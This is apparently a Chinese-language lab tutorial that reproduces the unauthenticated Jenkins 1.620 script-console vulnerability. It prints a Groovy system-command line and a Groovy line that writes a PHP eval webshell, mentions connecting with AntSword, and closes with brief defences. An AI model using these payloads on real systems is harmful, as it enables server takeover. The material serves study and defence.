jenkins未授权访问漏洞复现 0x00 漏洞描述 0x01 漏洞环境搭建(win10)  0x02 漏洞复现  0x03 漏洞防御

未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。

0x01 漏洞环境搭建(win10)

官方下载jenkins-1.620.zip,下载地址:http://mirrors.jenkins.io

运行setup.exe,安装即可,安装成功后在任务管理器中运行jenkins服务

jenkins未授权访问漏洞复现
0x00 漏洞描述
0x01 漏洞环境搭建(win10)
 0x02 漏洞复现
 0x03 漏洞防御

 之后访问http://localhost:8080即可

jenkins未授权访问漏洞复现
0x00 漏洞描述
0x01 漏洞环境搭建(win10)
 0x02 漏洞复现
 0x03 漏洞防御

 0x02 漏洞复现

1、浏览器访问http://localhost:8080/manage,可以看到没有做任何限制,可以直接访问

jenkins未授权访问漏洞复现
0x00 漏洞描述
0x01 漏洞环境搭建(win10)
 0x02 漏洞复现
 0x03 漏洞防御

 2、点击”脚本命令行”

3、执行系统命令,下图看到成功执行系统命令

println "whoami".execute().text

jenkins未授权访问漏洞复现
0x00 漏洞描述
0x01 漏洞环境搭建(win10)
 0x02 漏洞复现
 0x03 漏洞防御

 4、利用”脚本命令行”上传webshell,内容如下:

new File("D:\phpstudy_pro\WWW\ma.php").write('<?php @eval($_POST[cmd]);?>');

jenkins未授权访问漏洞复现
0x00 漏洞描述
0x01 漏洞环境搭建(win10)
 0x02 漏洞复现
 0x03 漏洞防御

 成功写入

5、蚁剑连接

jenkins未授权访问漏洞复现
0x00 漏洞描述
0x01 漏洞环境搭建(win10)
 0x02 漏洞复现
 0x03 漏洞防御

 0x03 漏洞防御

1、对后台控制页面做登录验证限制

2、升级版本

参考文章:https://www.cnblogs.com/yuzly/p/11255609.html